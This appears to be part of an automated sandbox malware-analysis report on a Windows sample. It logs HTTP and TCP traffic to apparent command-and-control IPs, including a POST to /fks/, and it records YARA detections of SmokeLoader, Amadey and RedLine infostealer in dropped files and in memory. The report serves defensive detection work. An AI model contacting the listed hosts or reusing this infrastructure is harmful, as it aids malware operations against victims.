Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:01 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 3c 96 b8 30 17 fe 15 ed 03 30 c8 Data Ascii: H>99$JYWtaE<00
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 403Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 46Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 73 6b 98 d5 45 a9 8d 3b 8d ad 24 17 ed 1a ae 07 26 83 5c 9a e8 Data Ascii: H>99$JYWskE;$&\
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 273Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 36 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.61 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jul 2023 23:33:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 403Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.29 Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.68.29
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.47

Source: unknown

HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owqnotnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: 77.91.68.29

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:50304 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: q4B165cujP.exe, type: SAMPLE
Source: Yara match	File source: 4.0.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfshvii, type: DROPPED

Source: q4B165cujP.exe, 00000000.00000002.420595766.000000000056A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 40.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 22.2.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 5.3.6F2B.exe.5125820.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.3.6F2B.exe.5125820.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.0.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 12.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 42.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 9.3.y4910383.exe.4b9dc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 28.0.j8994074.exe.7a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 8.3.D217.exe.e9da20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 29.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 21.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 8.3.D217.exe.e9da20.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 37.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 42.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 29.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 40.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 9.3.y4910383.exe.4b9dc20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 22.0.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 37.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 7.2.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: 0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b Author: unknown

PE file has a writeable .text section

Source: q4B165cujP.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jfshvii.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00933BA2	5_2_00933BA2
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00935C9E	5_2_00935C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE3BA2	6_2_00CE3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE5C9E	6_2_00CE5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C3328	7_2_011C3328
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C6BA1	7_2_011C6BA1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011B8C50	7_2_011B8C50
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C6CC1	7_2_011C6CC1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C7F1D	7_2_011C7F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C2E90	7_2_011C2E90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011C8ED0	7_2_011C8ED0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011A5EF0	7_2_011A5EF0

Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Section loaded: dxgidebug.dll

Source: q4B165cujP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 40.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 22.2.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 5.3.6F2B.exe.5125820.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.3.6F2B.exe.5125820.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.0.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 12.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 42.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 9.3.y4910383.exe.4b9dc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 28.0.j8994074.exe.7a0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
